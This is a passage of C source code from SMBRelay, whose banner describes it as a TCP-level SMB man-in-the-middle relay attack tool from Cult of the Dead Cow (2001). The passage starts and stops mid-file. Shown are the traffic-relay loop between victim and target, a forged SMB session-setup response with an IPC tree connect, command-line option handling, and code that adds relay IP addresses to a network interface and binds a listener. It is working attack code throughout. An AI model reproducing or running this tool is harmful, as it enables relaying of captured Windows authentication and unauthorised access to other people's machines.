psessionsetupandresponse->AndXOffset = 0;
}
else
{
PTREE_CONNECT_ANDRESPONSEHEADER ptreeconnectand = (PTREE_CONNECT_ANDRESPONSEHEADER)( (char *)psmbheader + psessionsetupandresponse->AndXOffset );
ptreeconnectand->Len = TREE_CONNECT_ANDRESPONSEHEADER_LEN;
ptreeconnectand->AndXCommand = SMB_NONE;
ptreeconnectand->AndXOffset = 0;
ptreeconnectand->AndXReserved = 0;
ptreeconnectand->OptionalSupport = 0;
char *ptr = (char *)(ptreeconnectand + 1);
strcpy(ptr, "IPC");
ptreeconnectand->ByteCount = strlen(ptr) + 3;
ptr += strlen(ptr) + 1;
*ptr = 0;
ptr++;
*ptr = 0;
pnbsessionheader->Length = htons(ntohs(pnbsessionheader->Length) + ptreeconnectand->Len * 2 + ptreeconnectand->ByteCount + 4);
}
x = send(relayconnectionsock, buff, ntohs(pnbsessionheader->Length) + 4, 0);
printf(" *** Sent SMB Session setup response for relay to %s\n", hostname);
bDoSend = FALSE;
}
break;
}
}
}
}
if (bContinue && bDoSend && datalen > 0)
{
totallen = 0;
do
{
x = send(outsock, buff + totallen, datalen - totallen, 0);
if (x == 0)
{
bContinue = FALSE;
bConnected = FALSE;
printf("Target %s disconnected durring send\n", hostname);
}
else if (x == -1)
{
DWORD err = WSAGetLastError();
if (err == WSAEWOULDBLOCK)
Sleep(5);
else
{
bContinue = FALSE;
bConnected = FALSE;
printf("Error %d sending data to target %s\n", err, hostname);
}
}
else
{
totallen += x;
}
} while (bContinue && totallen < datalen && !g_bQuit);
}
if (bContinue && !g_bQuit)
{
datalen = recv(outsock, buff, sizeof(NBSESSIONHEADER), 0);
if (datalen < 1)
{
if (datalen == 0)
{
printf("Target %s connection disconnected\n", hostname);
bContinue = FALSE;
bConnected = FALSE;
}
else
{
DWORD err = WSAGetLastError();
if (err != WSAEWOULDBLOCK)
{
bContinue = FALSE;
bConnected = FALSE;
printf("Error %d receiving header from target %s\n", err, hostname);
}
}
}
else
{
totallen = ntohs(pnbsessionheader->Length) + 4;
if (g_DebugLevel > 1)
printf("Received response header, expecting %d bytes from target %s\n", totallen, hostname);
while (bContinue && datalen < totallen && !g_bQuit)
{
x = recv(outsock, buff + datalen, totallen - datalen, 0);
if (x > 0)
datalen += x;
else
{
if (x == 0)
{
printf("Target %s connection disconnected\n", hostname);
bContinue = FALSE;
bConnected = FALSE;
}
else
{
DWORD err = WSAGetLastError();
if (err == WSAEWOULDBLOCK)
Sleep(5);
else
{
bContinue = FALSE;
bConnected = FALSE;
printf("Error %d receiving data from target %s\n", err, hostname);
}
}
}
}
}
if (bContinue && datalen > 0 && !g_bQuit)
{
if (g_DebugLevel > 0)
printf("Received %d byte response from target %s\n", datalen, hostname);
if (pnbsessionheader->Flags != 0)
printf("Response Flags: 0x%04x target %s\n", pnbsessionheader->Flags, hostname );
totallen = 0;
do
{
x = send(relayconnectionsock, buff + totallen, datalen - totallen, 0);
if (x == 0)
{
bContinue = FALSE;
printf("Relay host disconnected durring send from target %s\n", hostname);
}
else if (x == -1)
{
DWORD err = WSAGetLastError();
if (err == WSAEWOULDBLOCK)
Sleep(5);
else
{
bContinue = FALSE;
printf("Error %d sending data to relay host from target %s\n", err, hostname);
}
}
else
{
totallen += x;
}
} while (bContinue && totallen < datalen && !g_bQuit);
}
}
if (datalen < 1)
Sleep(5);
} while (bContinue && !g_bQuit);
printf(" *** Relay disconnected from target %s\n", hostname);
closesocket(relayconnectionsock);
}
exitrelay:
if (g_bAddRelayIP)
{
DeleteIPAddress(NTEContext);
printf("Deleted relay IP address %s for target %s\n", inet_ntoa( sockaddr.sin_addr), hostname);
}
}
closesocket(outsock);
printf("*** Target %s Disconnected\n", hostname);
// remove host from list
ConnectedList[hostnumber] = 0;
// clean up end of list
while (ConnectedSize > 0 && ConnectedList[ConnectedSize] == 0)
ConnectedSize--;
}
/*
 * Termination signal handler.
 *
 * Prints a one-line notice and raises the global g_bQuit flag, which the
 * relay loops elsewhere in this file poll to wind down. The signal number
 * is not inspected: whatever signal this handler is registered for is
 * treated as a quit request.
 *
 * NOTE(review): stdio calls are not async-signal-safe in standard C; the
 * original handler already printed from here, so the message is kept, but a
 * flag-only handler (with the notice printed by the main loop) would be the
 * safer shape.
 */
void SignalHandler(int sig)
{
    (void)sig;  /* every delivered signal is handled the same way */
    fputs("Termination requested...\n", stdout);
    g_bQuit = TRUE;
}
/*
 * Print the command-line help text to stdout, one line per puts() call.
 *
 * The lines are kept in a single table so the option list reads as one
 * unit; the order of the table is the order printed. No return value and
 * no side effects beyond writing to stdout.
 */
void Usage( )
{
    static const char *const help_lines[] = {
        "Usage: smbrelay [options]",
        " Options:",
        " /D num - Set debug level, current valid levels: 0 (none), 1, 2",
        " Defaults to 0",
        " /E - Enumerates interfaces and their indexes",
        " /IL num - Set the interface index to use when adding local IP addresses",
        " /IR num - Set the interface index to use when adding relay IP addresses",
        " Defaults to 1. Use /E to display the adapter indexes",
        " /L[+] IP - Set the local IP to listen on for incoming NetBIOS connections",
        " Use + to first add the IP address to the NIC",
        " Defaults to primary host IP",
        " /R[-] IP - Set the starting relay IP address to use",
        " Use - to NOT first add each relay IP address to the NIC",
        " Defaults to 192.1.1.1",
        " /S name - Set the source machine name",
        " Defaults to CDC4EVER",
    };
    const size_t count = sizeof help_lines / sizeof help_lines[0];

    for (size_t i = 0; i < count; i++) {
        puts(help_lines[i]);
    }
}
int main(int argc, char* argv[])
{
SOCKET tcpsock, inconsock;
WSADATA wsadata;
BOOL b;
DWORD d, NTEContext, NTEInstance;
LPHOSTENT phostent;
SOCKADDR_IN sockaddr;
int x;
puts("SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack");
puts(" Copyright 2001: Sir Dystic, Cult of the Dead Cow");
puts(" Send complaints, ideas and donations to sirdystic@cultdeadcow.com");
for (x = 1; x < argc; x++)
{
if (argv[x][0] == '/')
{
if (stricmp(argv[x], "/IR") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /IR\n");
Usage();
return 0;
}
x++;
g_RelayInterfaceNumber = strtoul(argv[x], NULL, 16);
}
else if (stricmp(argv[x], "/IL") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /IL\n");
Usage();
return 0;
}
x++;
g_LocalInterfaceNumber = strtoul(argv[x], NULL, 16);
}
else if (stricmp(argv[x], "/D") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /D\n");
Usage();
return 0;
}
x++;
g_DebugLevel = atoi(argv[x]);
}
else if (stricmp(argv[x], "/E") == 0)
{
DWORD e, NumOfInterfaces = 0;
e = GetNumberOfInterfaces(&NumOfInterfaces);
if (e != NO_ERROR)
{
printf("Unable to retrieve number of interfaces: Error %d - %s\n", e, StrError(e));
}
else
{
DWORD buffsize = sizeof(MIB_IFROW) * (NumOfInterfaces + 5);
PMIB_IFTABLE piftable = (PMIB_IFTABLE)malloc(buffsize);
e = GetIfTable(piftable, &buffsize, FALSE);
if (e != ERROR_SUCCESS)
{
printf("Unable to get interface table: Error %d - %s\n", e, StrError(e));
}
else
{
for (e = 0; e < piftable->dwNumEntries; e++)
{
printf("[%x] %s - %s\n", piftable->table[e].dwIndex, GetInterfaceType(piftable->table[e].dwType), piftable->table[e].bDescr );
}
}
///
free(piftable);
}
return 0;
}
else if (stricmp(argv[x], "/L") == 0 || stricmp(argv[x], "/L+") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /L\n");
Usage();
return 0;
}
if (argv[x][2] == '+')
g_bAddLocalIP = TRUE;
x++;
g_LocalIP = inet_addr(argv[x]);
if (g_LocalIP == INADDR_NONE)
{
fprintf(stdout, "Bad IP: \"%s\"\n", argv[x]);
Usage();
return 0;
}
}
else if (stricmp(argv[x], "/R") == 0 || stricmp(argv[x], "/R-") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /R\n");
Usage();
return 0;
}
if (argv[x][2] == '-')
g_bAddRelayIP = FALSE;
x++;
g_RelayStartIP = inet_addr(argv[x]);
if (g_RelayStartIP == INADDR_NONE)
{
fprintf(stdout, "Bad IP: \"%s\"\n", argv[x]);
Usage();
return 0;
}
}
else if (stricmp(argv[x], "/S") == 0)
{
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for /S\n");
Usage();
return 0;
}
x++;
strncpy(g_SourceName, argv[x], 15);
g_SourceName[15] = 0;
strupr(g_SourceName);
}
else if (stricmp(argv[x], "/?") == 0 || stricmp(argv[x], "/HELP") == 0)
{
Usage();
return 0;
}
else
{
fprintf(stdout, "Bad option: \"%s\"\n", argv[x] );
Usage();
return 0;
}
}
}
memset(&wsadata, 0, sizeof(wsadata));
WSAStartup(MAKEWORD(1, 1), &wsadata);
if (g_bAddLocalIP)
{
if (g_LocalInterfaceNumber == 0)
{
GetBestInterface(g_LocalIP, &g_LocalInterfaceNumber);
}
MIB_IFROW ifrow;
memset(&ifrow, 0, sizeof(ifrow));
ifrow.dwIndex = g_LocalInterfaceNumber;
d = GetIfEntry(&ifrow);
if (d == NO_ERROR)
{
printf("Using local adapter index %x: %s\n", g_LocalInterfaceNumber, ifrow.bDescr);
}
else
{
printf("Local adapter index %x may be invalid! Error %d: %s\n", g_LocalInterfaceNumber, d, StrError(d));
}
}
if (g_bAddRelayIP)
{
MIB_IFROW ifrow;
memset(&ifrow, 0, sizeof(ifrow));
ifrow.dwIndex = g_RelayInterfaceNumber;
d = GetIfEntry(&ifrow);
if (d == NO_ERROR)
{
printf("Using relay adapter index %x: %s\n", g_RelayInterfaceNumber, ifrow.bDescr);
}
else
{
printf("Relay adapter index %x may be invalid! Error %d: %s\n", g_RelayInterfaceNumber, d, StrError(d));
}
}
tcpsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (tcpsock == INVALID_SOCKET)
{
printf("Error %d creating socket\n", GETSOCKETERROR() );
return 0;
}
b = TRUE;
if (setsockopt(tcpsock, SOL_SOCKET, SO_REUSEADDR, (const char *)&b, sizeof(b) ) == SOCKET_ERROR)
{
printf("Error %d setting socket option SO_REUSEADDR\n", GETSOCKETERROR() );
closesocket(tcpsock);
return 0;
}
if (g_LocalIP == INADDR_NONE)
{
char buff[64];
if (gethostname((char *)buff, sizeof(buff) ) == SOCKET_ERROR)
{
printf("Error %d getting local host name\n", GETSOCKETERROR() );
closesocket(tcpsock);
return 0;
}
phostent = gethostbyname((char *)buff);
if (phostent == NULL)
{
printf("Error %d getting local address for name %s\n", GETSOCKETERROR(), buff );
closesocket(tcpsock);
return 0;
}
g_LocalIP = ((struct in_addr *) phostent->h_addr)->s_addr;
}
sockaddr.sin_addr.s_addr = g_LocalIP;
sockaddr.sin_port = htons(g_LocalPort);
sockaddr.sin_family = AF_INET;
if (g_bAddLocalIP)
{
DWORD Netmask = inet_addr("255.255.255.0");
d = AddIPAddress(g_LocalIP, Netmask, g_LocalInterfaceNumber, &NTEContext, &NTEInstance);
if (d != NO_ERROR)
printf("Error %d adding IP address to interface %x: %s\n", d, g_LocalInterfaceNumber, StrError(d));
else
printf("Local IP address added to interface %x\n", g_LocalInterfaceNumber);
}
if (bind(tcpsock, (LPSOCKADDR)&sockaddr, sizeof(sockaddr) ) == SOCKET_ERROR)
{
d = GETSOCKETERROR();
printf("Error %u binding to port %d at address %s\n", d, g_LocalPort, inet_ntoa(sockaddr.sin_addr) );
closesocket(tcpsock);
return 0;
} else {
printf("Bound to port %d on address %s\n", g_LocalPort, inet_ntoa(sockaddr.sin_addr) );
}
if (listen(tcpsock, SOMAXCONN) == SOCKET_ERROR)
{
d = GETSOCKETERROR();